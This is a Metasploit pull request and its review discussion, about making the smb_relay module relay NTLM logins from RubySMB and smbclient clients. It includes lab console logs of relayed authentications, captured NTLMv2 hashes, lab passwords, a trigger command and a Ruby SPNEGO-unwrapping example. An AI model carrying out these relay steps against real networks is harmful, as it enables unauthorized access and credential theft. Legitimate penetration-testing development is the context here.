
Add support for Ruby SMB Client to be compatible with Msf::Exploit::Remote::SMB::RelayServer #20967

Merged
cdelafuente-r7 merged 11 commits into rapid7:master from jheysel-r7:fix/lib/smb_relay_ruby_client_support on Mar 24, 2026

Conversation

@jheysel-r7
Contributor
@jheysel-r7 jheysel-r7 commented Feb 12, 2026

This fixes the following issues:

  1. Ruby SMB Client is incompatible with Msf::Exploit::Remote::SMB::RelayServer.
    In order to relay NTLM authentication from a Ruby SMB client properly, the NTLMSSP messages must first be unwrapped from their GSSAPI wrapping. The Windows net use does not wrap its NTLM message, which is partially why Metasploit's smb_relay has only worked with net use - until now!

  2. smbclient is not compatible with Msf::Exploit::Remote::SMB::RelayServer
    Not all SMB clients respond with a reauthentication attempt to the error code STATUS_NETWORK_SESSION_EXPIRED, which our smb_relay server depended upon until now. This fixes the smb_relay server so that if only one RHOST is specified, NTLM authentication is immediately forwarded. This allows smbclient and others to be compatible with the smb_relay server when only one target is specified.

Due to the large number of PRs and the fact that both of these fixes require the related fix in ruby_smb, I figured I'd combine them.

Requirements

This fix requires changes from ruby_smb. Be sure to pull in those changes and reference your local copy of ruby_smb in your Gemfile prior to testing:

gem 'ruby_smb', path: '../ruby_smb'

Testing

  1. Start the relay server - input multiple RHOSTs to ensure the relay server is still able to relay to multiple targets
msf exploit(windows/smb/smb_relay) > set smbdomain kerberos.issue
smbdomain => kerberos.issue
msf exploit(windows/smb/smb_relay) > set rhosts 172.16.199.199 172.16.199.200 
rhosts => 172.16.199.199 172.16.199.200
msf exploit(windows/smb/smb_relay) > run 
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444 
msf exploit(windows/smb/smb_relay) > [*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.

(The relay server output will be continued below)

  2. Start a second instance of msfconsole and run the smb_login module, sending the authentication request to your relay server
msf auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   ANONYMOUS_LOGIN    false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   CreateSession      false            no        Create a new session for every successful login
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS             172.16.199.1     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          kerberos.issue   no        The Windows domain to use for authentication
   SMBPass            N0tpassword!     no        The password for the specified username
   SMBUser            administrator    no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/smb/smb_login) > run
[*] 172.16.199.1:445      - 172.16.199.1:445      - Starting SMB login bruteforce
[+] 172.16.199.1:445      - 172.16.199.1:445      - Success: 'kerberos.issue\administrator:N0tpassword!'
[*] 172.16.199.1:445      - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.199.1:445      - Bruteforce completed, 1 credential was successful.
[*] 172.16.199.1:445      - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) >
  3. Back in your relay server, see that the authentication request was successful and you now have an SMB session you can interact with:
[*] New request from 172.16.199.1
I, [2026-02-12T13:45:51.508983 #39704]  INFO -- : Starting thread for connection from 172.16.199.1
I, [2026-02-12T13:45:51.907731 #39704]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-02-12T13:45:51.949415 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2026-02-12T13:45:52.014548 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: nil, state: :in_progress>)
I, [2026-02-12T13:45:52.026555 #39704]  INFO -- : NTLM authentication request overridden to succeed for kerberos.issue\administrator
D, [2026-02-12T13:45:52.124182 #39704] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :valid>)
[*] Received request for kerberos.issue\administrator
[*] Relaying to next target smb://172.16.199.199:445
[-] Timeout error retrieving server challenge from target smb://172.16.199.199:445. Most likely caused by unresponsive target
D, [2026-02-12T13:46:17.229921 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
D, [2026-02-12T13:46:17.278971 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
I, [2026-02-12T13:46:17.297245 #39704]  INFO -- : NTLM authentication request overridden to succeed for kerberos.issue\administrator
D, [2026-02-12T13:46:17.332264 #39704] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :valid>)
[*] Received request for kerberos.issue\administrator
[*] Relaying to next target smb://172.16.199.200:445
D, [2026-02-12T13:46:17.362174 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
I, [2026-02-12T13:46:30.765084 #39704]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-02-12T13:46:30.849669 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
I, [2026-02-12T13:46:30.851325 #39704]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as kerberos.issue\administrator
[+] Identity: kerberos.issue\administrator - Successfully authenticated against relay target smb://172.16.199.200:445
[SMB] NTLMv2-SSP Client     : 172.16.199.200
[SMB] NTLMv2-SSP Username   : kerberos.issue\administrator
[SMB] NTLMv2-SSP Hash       : administrator::kerberos.issue:0d0719bece0ac1ce:51c99ec599139b20872db55375008ee2:0101000000000000003fef0b699cdc013483b98a24ef08f300000000020010004b00450052004200450052004f0053000100060044004300320004001c006b00650072006200650072006f0073002e0069007300730075006500030024006400630032002e006b00650072006200650072006f0073002e006900730073007500650005001c006b00650072006200650072006f0073002e006900730073007500650007000800ecb6690c699cdc010000000000000000

[*] SMB session 6 opened (172.16.199.1:58102 -> 172.16.199.200:445) at 2026-02-12 13:46:51 -0800
D, [2026-02-12T13:46:51.315641 #39704] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :valid>)
[*] Received request for kerberos.issue\administrator
[*] Relaying to next target smb://172.16.199.199:445


msf exploit(windows/smb/smb_relay) > msf exploit(windows/smb/smb_relay) > 
msf exploit(windows/smb/smb_relay) > sessions -i -1 
[*] Starting interaction with 6...

SMB (172.16.199.200) > shares
Shares
======

    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  IPC$      IPC|SPECIAL   Remote IPC
    3  NETLOGON  DISK          Logon server share
    4  SYSVOL    DISK          Logon server share

SMB (172.16.199.200) > 
  4. Kill the relay server job with jobs -K, set only one RHOST and verify auth can be successfully relayed to one target by smbclient (or any client that doesn't support resending an authentication after the session-expired SMB status code)

Trigger the relay like so:

(.venv) (devbox) ➜  smbcmp git:(master) ✗ smbclient //172.16.199.1/ADMIN$ -U KERBEROS\\Administrator%N0tpassword!
session setup failed: NT_STATUS_INVALID_PARAMETER

And verify it works:

msf exploit(windows/smb/smb_relay) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
msf exploit(windows/smb/smb_relay) > [*] 172.16.199.200:445 - SMB Server is running. Listening on 0.0.0.0:445
[*] 172.16.199.200:445 - Server started.
[*] 172.16.199.200:445 - New request from 172.16.199.131
I, [2026-03-16T20:30:53.171534 #85581]  INFO -- : Starting thread for connection from 172.16.199.131
I, [2026-03-16T20:30:53.281599 #85581]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-03-16T20:30:53.293959 #85581] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
[*] 172.16.199.200:445 - Relaying to next target smb://172.16.199.200:445
I, [2026-03-16T20:30:53.342984 #85581]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: false)
D, [2026-03-16T20:30:53.385423 #85581] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 1574663220, user_id: nil, state: :in_progress>)
I, [2026-03-16T20:30:53.403892 #85581]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as
[+] 172.16.199.200:445 - Identity:  - Successfully authenticated against relay target smb://172.16.199.200:445
[SMB] NTLMv2-SSP Client     : 172.16.199.200
[SMB] NTLMv2-SSP Username   : KERBEROS\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::KERBEROS:68344e5d7e5f70d1:6f3168b10ab785b56c7d731629a69c8c:...

[*] SMB session 1 opened (172.16.199.1:59507 -> 172.16.199.200:445) at 2026-03-16 20:30:55 -0700
I, [2026-03-16T20:30:55.303934 #85581]  INFO -- : Ending thread for connection from 172.16.199.131
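
The GSSAPI unwrapping the PR description refers to, shown as an added example that is not code from ruby_smb or Metasploit: a standalone Ruby walker that takes the security buffer of an SMB2 SESSION_SETUP request and returns the raw NTLMSSP message, whether the client sent it bare (as Windows `net use` does) or wrapped in a SPNEGO NegTokenInit/NegTokenResp (as RubySMB and smbclient do). The DER helpers, the SPNEGO builders, the sample NEGOTIATE message and the function names (`extract_ntlmssp`, `ntlm_message_type`, ...) are all constructed for this illustration; ruby_smb has its own GSS handling and the relay code in this PR does not use these names.

```ruby
# Added example (not ruby_smb or Metasploit code): unwrap the NTLMSSP message
# that an SMB client places in the SESSION_SETUP security buffer. Windows
# `net use` sends the NTLMSSP message bare; RubySMB, smbclient and most other
# clients wrap it in SPNEGO (GSS-API), so a relay server has to unwrap it
# before it can forward the type 1 / type 3 messages to the relay target.

NTLMSSP_SIGNATURE = "NTLMSSP\x00".b

# --- minimal DER helpers ---------------------------------------------------

# Encode one DER TLV (definite length only).
def der(tag, value)
  value = value.b
  len = value.bytesize
  len_bytes =
    if len < 0x80
      [len].pack("C")
    else
      enc = [len].pack("N")
      enc = enc.byteslice(1, enc.bytesize - 1) while enc.bytesize > 1 && enc.getbyte(0).zero?
      [0x80 | enc.bytesize].pack("C") + enc
    end
  [tag].pack("C") + len_bytes + value
end

# Decode the TLV at the front of `bytes`; returns [tag, value, remaining_bytes].
def der_read(bytes)
  raise ArgumentError, "truncated DER" if bytes.bytesize < 2
  tag = bytes.getbyte(0)
  len = bytes.getbyte(1)
  off = 2
  if len >= 0x80
    n = len - 0x80
    raise ArgumentError, "indefinite length not allowed in DER" if n.zero?
    lb = bytes.byteslice(off, n)
    raise ArgumentError, "truncated DER" if lb.nil? || lb.bytesize != n
    len = lb.bytes.inject(0) { |acc, b| (acc << 8) | b }
    off += n
  end
  value = bytes.byteslice(off, len)
  raise ArgumentError, "truncated DER" if value.nil? || value.bytesize != len
  [tag, value, bytes.byteslice(off + len, bytes.bytesize - off - len)]
end

# --- SPNEGO ----------------------------------------------------------------

SPNEGO_OID  = "\x06\x06\x2b\x06\x01\x05\x05\x02".b                 # 1.3.6.1.5.5.2
NTLMSSP_OID = "\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a".b # 1.3.6.1.4.1.311.2.2.10

# First SESSION_SETUP of a wrapping client: GSS-API InitialContextToken carrying
# a NegTokenInit whose mechToken is the NTLM NEGOTIATE (type 1) message.
def spnego_neg_token_init(mech_token)
  mech_types = der(0xa0, der(0x30, NTLMSSP_OID))   # [0] mechTypes
  token      = der(0xa2, der(0x04, mech_token))    # [2] mechToken
  der(0x60, SPNEGO_OID + der(0xa0, der(0x30, mech_types + token)))
end

# Second SESSION_SETUP: NegTokenResp whose responseToken is the NTLM
# AUTHENTICATE (type 3) message.
def spnego_neg_token_resp(response_token)
  der(0xa1, der(0x30, der(0xa2, der(0x04, response_token))))   # [2] responseToken
end

# Depth-first search of the DER tree for an OCTET STRING holding NTLMSSP.
def find_ntlm_token(bytes)
  until bytes.empty?
    tag, value, bytes = der_read(bytes)
    return value if tag == 0x04 && value.start_with?(NTLMSSP_SIGNATURE)
    if (tag & 0x20) != 0   # constructed: SEQUENCE, [n] context tag, APPLICATION
      found = find_ntlm_token(value)
      return found if found
    end
  end
  nil
end

# Entry point for a relay: the raw NTLMSSP message, or nil if the buffer is
# neither a bare NTLMSSP message nor a well-formed SPNEGO token carrying one.
def extract_ntlmssp(security_buffer)
  buf = security_buffer.b
  return buf if buf.start_with?(NTLMSSP_SIGNATURE)   # bare, e.g. Windows net use
  find_ntlm_token(buf)
rescue ArgumentError
  nil
end

# MessageType field of an NTLMSSP message: 1 NEGOTIATE, 2 CHALLENGE, 3 AUTHENTICATE.
def ntlm_message_type(ntlm)
  ntlm.byteslice(8, 4).unpack1("V")
end

# Constructed sample: a 32-byte NTLM NEGOTIATE message (signature, type 1,
# flags, empty domain and workstation fields).
SAMPLE_NEGOTIATE = (NTLMSSP_SIGNATURE + [1, 0xe2088297].pack("V2") +
                    [0, 0, 0].pack("vvV") + [0, 0, 0].pack("vvV")).b

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_NEGOTIATE, spnego_neg_token_init(SAMPLE_NEGOTIATE)].each do |blob|
    ntlm = extract_ntlmssp(blob)
    puts "#{blob.bytesize}-byte buffer -> NTLM type #{ntlm_message_type(ntlm)} (#{ntlm.bytesize} bytes)"
  end
end
```

The search is deliberately structural rather than a `"NTLMSSP"` substring scan: only an OCTET STRING whose content starts with the signature is accepted, so a mechListMIC or an OID that happens to contain those bytes is not mistaken for the token, and a truncated or indefinite-length blob yields nil instead of a partially parsed message being relayed.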

@jheysel-r7 jheysel-r7 changed the title Add support for Ruby SMB Client to be incompatible with Msf::Exploit::Remote::SMB::RelayServer Add support for Ruby SMB Client to be compatible with Msf::Exploit::Remote::SMB::RelayServer Feb 13, 2026
Moved gss handling to separate func as per TODO

Remove debug output
@jheysel-r7 jheysel-r7 force-pushed the fix/lib/smb_relay_ruby_client_support branch from 656b38b to fe9f498 Compare February 13, 2026 01:56
@github-actions

Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.

We've added the additional-testing-required label to indicate that additional testing is required before this pull request can be merged.
For maintainers, this means visiting here.

@smcintyre-r7 smcintyre-r7 moved this from Todo to Ready in Metasploit Kanban Mar 17, 2026
@cdelafuente-r7 cdelafuente-r7 self-assigned this Mar 17, 2026
@cdelafuente-r7 cdelafuente-r7 moved this from Ready to In Progress in Metasploit Kanban Mar 17, 2026
@jenkins-eks-metasploit

Additional test pipeline started ⌛
Note: build results only accessible to maintainers.

@jenkins-eks-metasploit

Pipeline results available

Slice summary:

  • Test slice 1 - 🟢
  • Test slice 2 - 🟢
  • Test slice 3 - 🟢
  • Test slice 4 - 🟢

Note: build results only accessible to maintainers.

Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Thanks @jheysel-r7 for these updates. I tested it and it works great using one or two relay targets with the RubySMB client. I just left a few comments and questions.

One issue I found with a very specific use case is when you create a SMB session from the client while it's being relayed by a second instance of msfconsole. The resulting SMB session ends up being unusable.

msf auxiliary(scanner/smb/smb_login) > run verbose=true rhosts=192.168.22.1 smbuser=smbuser smbpass=123456 CreateSession=true
[*] 192.168.22.1:445     - 192.168.22.1:445     - Starting SMB login bruteforce
[+] 192.168.22.1:445     - 192.168.22.1:445     - Success: '.\smbuser:123456'
[!] 192.168.22.1:445     - No active DB -- Credential data will not be saved!
[*] SMB session 2 opened (192.168.22.129:38481 -> 192.168.22.1:445) at 2026-03-19 13:17:42 +0100
[*] 192.168.22.1:445     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.22.1:445     - Bruteforce completed, 1 credential was successful.
[*] 192.168.22.1:445     - 1 SMB session was opened successfully.
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) > sessions

Active sessions
===============

  Id  Name  Type  Information                      Connection
  --  ----  ----  -----------                      ----------
  2         smb   SMB smbuser @ 192.168.22.1:445  192.168.22.129:38481 -> 192.168.22.1:445 (192.168.22.1)

msf auxiliary(scanner/smb/smb_login) > use scanner/smb/smb_enumshares
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf auxiliary(scanner/smb/smb_enumshares) > run verbose=true rhosts=192.168.22.1 session=2
[*] Using existing session 2
[*] Error: 192.168.22.1: RubySMB::Error::CommunicationError Socket read returned nil
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I believe this is not something a user would do often, and doing so would inevitably result in a failure, but I just wanted to call it out.

@jheysel-r7
Contributor Author

Thanks for the review @cdelafuente-r7! Much appreciated. I thought I had seen that unusable SMB session issue before as well. After ensuring all the necessary registry keys were set appropriately to allow for SMB relaying, doing more testing to ensure the PSEXEC action was working, I wasn't able to reproduce the broken SMB session. The following output was triggered by relaying auth from a separate msfconsole window using smb_login:

[screenshot: smb_relay CREATE_SMB_SESSION working]

The following output highlights the only changes I have on the branch are pulling in the ruby_smb changes:

➜  metasploit-framework git:(fix/lib/smb_relay_ruby_client_support) ✗ git status
On branch fix/lib/smb_relay_ruby_client_support
Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
	modified:   Gemfile
	modified:   Gemfile.lock

no changes added to commit (use "git add" and/or "git commit -a")
➜  metasploit-framework git:(fix/lib/smb_relay_ruby_client_support) ✗ bundle install
Bundle complete! 20 Gemfile dependencies, 245 gems now installed.
Bundled gems are installed into `../../.vendor/bundle`
1 installed gem you directly depend on is looking for funding.
  Run `bundle fund` for details
➜  metasploit-framework git:(fix/lib/smb_relay_ruby_client_support) ✗ ./msfconsole -q
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[*] Setting default action CREATE_SMB_SESSION - view all 2 actions with the show actions command
[*] New in Metasploit 6.4 - The CREATE_SMB_SESSION action within this module can open an interactive session
msf exploit(windows/smb/smb_relay) > options

Module options (exploit/windows/smb/smb_relay):

   Name                  Current Setting                Required  Description
   ----                  ---------------                --------  -----------
   JOHNPWFILE                                           no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashes, each of which is stored in separate files. Can also be a path.
   RELAY_TIMEOUT         25                             yes       Seconds that the relay socket will wait for a response after the client has initiated communication.
   RHOSTS                172.16.199.200 172.16.199.135  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   SERVICE_DESCRIPTION                                  no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                 no        The service display name
   SERVICE_NAME                                         no        The service name
   SMBDomain             .                              no        The Windows domain to use for authentication
   SMBSHARE                                             no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SRVHOST               0.0.0.0                        yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT               445                            yes       The local port to listen on.
   SRV_TIMEOUT           25                             yes       Seconds that the server socket will wait for a response after the client has initiated communication.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   PowerShell



Exploit action:

   Name                Description
   ----                -----------
   CREATE_SMB_SESSION  Do not close the SMB connection after relaying, and instead create an SMB session



View the full module info with the info, or info -d command.

msf exploit(windows/smb/smb_relay) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
msf exploit(windows/smb/smb_relay) > [*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 172.16.199.1
I, [2026-03-19T09:32:03.098589 #62454]  INFO -- : Starting thread for connection from 172.16.199.1
I, [2026-03-19T09:32:03.250210 #62454]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-03-19T09:32:03.260397 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2026-03-19T09:32:03.288294 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: nil, state: :in_progress>)
I, [2026-03-19T09:32:03.292005 #62454]  INFO -- : NTLM authentication request overridden to succeed for .\administrator
D, [2026-03-19T09:32:03.325168 #62454] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
[*] Received request for .\administrator
[*] Relaying to next target smb://172.16.199.200:445
D, [2026-03-19T09:32:03.349811 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :in_progress>)
I, [2026-03-19T09:32:03.382881 #62454]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-03-19T09:32:03.426573 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :in_progress>)
I, [2026-03-19T09:32:03.432395 #62454]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as .\administrator
[+] Identity: .\administrator - Successfully authenticated against relay target smb://172.16.199.200:445
[*] Skipping previously captured hash for .\administrator
[*] SMB session 1 opened (172.16.199.1:58377 -> 172.16.199.200:445) at 2026-03-19 09:32:05 -0700
D, [2026-03-19T09:32:05.104704 #62454] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
[*] Received request for .\administrator
[*] Relaying to next target smb://172.16.199.135:445
D, [2026-03-19T09:32:05.118577 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :in_progress>)
I, [2026-03-19T09:32:05.120336 #62454]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.135:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-03-19T09:32:05.151429 #62454] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :in_progress>)
I, [2026-03-19T09:32:05.152408 #62454]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.135:445 as .\administrator
[+] Identity: .\administrator - Successfully authenticated against relay target smb://172.16.199.135:445
[*] Skipping previously captured hash for .\administrator
[*] SMB session 2 opened (172.16.199.1:58379 -> 172.16.199.135:445) at 2026-03-19 09:32:05 -0700
D, [2026-03-19T09:32:05.816909 #62454] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
[*] Received request for .\administrator
[*] Identity: .\administrator - All targets relayed to
W, [2026-03-19T09:32:05.818628 #62454]  WARN -- : Received TREE_CONNECT request for non-existent share: admin$
D, [2026-03-19T09:32:05.839730 #62454] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
[*] Received request for .\administrator
[*] Identity: .\administrator - All targets relayed to
D, [2026-03-19T09:32:05.840785 #62454] DEBUG -- : Received TREE_CONNECT request for share: IPC$
D, [2026-03-19T09:32:05.861408 #62454] DEBUG -- : Dispatching request to do_logoff_smb2 (session: #<Session id: 2256682463, user_id: ".\\administrator", state: :valid>)
I, [2026-03-19T09:32:05.869936 #62454]  INFO -- : Ending thread for connection from 172.16.199.1

msf exploit(windows/smb/smb_relay) > sessions -l

Active sessions
===============

  Id  Name  Type         Information                Connection
  --  ----  ----         -----------                ----------
  1         smb windows  SMB  @ 172.16.199.200:445  172.16.199.1:58377 -> 172.16.199.200:445 (172.16.199.200)
  2         smb windows  SMB  @ 172.16.199.135:445  172.16.199.1:58379 -> 172.16.199.135:445 (172.16.199.200)

msf exploit(windows/smb/smb_relay) > use scanner/smb/smb_enumshares
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf auxiliary(scanner/smb/smb_enumshares) > run verbose=true rhosts=172.16.199.200 session=1
[*] Using existing session 1
[!] peer_native_os is only available with SMB1 (current version: SMB3)
[!] peer_native_lm is only available with SMB1 (current version: SMB3)
[+] ADMIN$ - (DISK|SPECIAL) Remote Admin
[+] C$ - (DISK|SPECIAL) Default share
[+] IPC$ - (IPC|SPECIAL) Remote IPC
[+] NETLOGON - (DISK) Logon server share
[+] SYSVOL - (DISK) Logon server share
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_enumshares) > run verbose=true rhosts=172.16.199.135 session=2
[*] Using existing session 2
[!] peer_native_os is only available with SMB1 (current version: SMB3)
[!] peer_native_lm is only available with SMB1 (current version: SMB3)
[+] ADMIN$ - (DISK|SPECIAL) Remote Admin
[+] C$ - (DISK|SPECIAL) Default share
[+] IPC$ - (IPC|SPECIAL) Remote IPC
[+] NETLOGON - (DISK) Logon server share
[+] SMB_TESTING - (DISK)
[+] SYSVOL - (DISK) Logon server share
[+] Users - (DISK)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@cdelafuente-r7
Contributor

Oh! I'm sorry I think I was not clear. I was talking about the session created by the client running smb_login, the one using the RubySMB client to connect to the relay server. The sessions created by the smb_relay work perfectly.

msf auxiliary(scanner/smb/smb_login) > run verbose=true rhosts=192.168.22.1 smbuser=smbuser smbpass=123456 CreateSession=true
[*] 192.168.22.1:445     - 192.168.22.1:445     - Starting SMB login bruteforce
[+] 192.168.22.1:445     - 192.168.22.1:445     - Success: '.\smbuser:123456'
[!] 192.168.22.1:445     - No active DB -- Credential data will not be saved!
[*] SMB session 1 opened (192.168.22.129:41197 -> 192.168.22.1:445) at 2026-03-23 19:01:47 +0100
[*] 192.168.22.1:445     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.22.1:445     - Bruteforce completed, 1 credential was successful.
[*] 192.168.22.1:445     - 1 SMB session was opened successfully.
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) > sessions -1
[*] Starting interaction with 1...

SMB (192.168.22.1) > shares
[-] Error running command shares: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_NOT_SUPPORTED

In this example, the client (smb_login) is 192.168.22.129 and it authenticates to the relay server on 192.168.22.1. I specifically ask for a session with the CreateSession option, which apparently works. However, when trying to interact with the session, it fails.

It is certainly an edge case that is not worth fixing, unless it is an easy fix, but I don't think so.

@cdelafuente-r7 cdelafuente-r7 moved this from In Progress to Waiting on Contributor in Metasploit Kanban Mar 23, 2026
@jheysel-r7
Contributor Author

> Oh! I'm sorry I think I was not clear. I was talking about the session created by the client running smb_login, the one using the RubySMB client to connect to the relay server. The sessions created by the smb_relay work perfectly.
>
> msf auxiliary(scanner/smb/smb_login) > run verbose=true rhosts=192.168.22.1 smbuser=smbuser smbpass=123456 CreateSession=true
> [*] 192.168.22.1:445     - 192.168.22.1:445     - Starting SMB login bruteforce
> [+] 192.168.22.1:445     - 192.168.22.1:445     - Success: '.\smbuser:123456'
> [!] 192.168.22.1:445     - No active DB -- Credential data will not be saved!
> [*] SMB session 1 opened (192.168.22.129:41197 -> 192.168.22.1:445) at 2026-03-23 19:01:47 +0100
> [*] 192.168.22.1:445     - Scanned 1 of 1 hosts (100% complete)
> [*] 192.168.22.1:445     - Bruteforce completed, 1 credential was successful.
> [*] 192.168.22.1:445     - 1 SMB session was opened successfully.
> [*] Auxiliary module execution completed
> msf auxiliary(scanner/smb/smb_login) > sessions -1
> [*] Starting interaction with 1...
>
> SMB (192.168.22.1) > shares
> [-] Error running command shares: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_NOT_SUPPORTED
>
> In this example, the client (smb_login) is 192.168.22.129 and it authenticates to the relay server on 192.168.22.1. I specifically ask for a session with the CreateSession option, which apparently works. However, when trying to interact with the session, it fails.
>
> It is certainly an edge case that is not worth fixing, unless it is an easy fix, but I don't think so.

Oh okay, right my apologies. I thought that was to be expected (although maybe it's not!). Whenever I would relay successfully from net use the session on the Windows client would never be usable, ie net use would fail with a number of different errors.

The smb_login module receives a Metasploit::Model::Login::Status::SUCCESSFUL from the relay server (because the relay server authenticated successfully) and then, based on that, it opens a session with the connection it had established with the relay server. The smb_login module is unaware that the successful login it received was against a different target than the one it originally connected to. The smb_login module trusts the successful authentication status and doesn't do much verification before opening the session here:

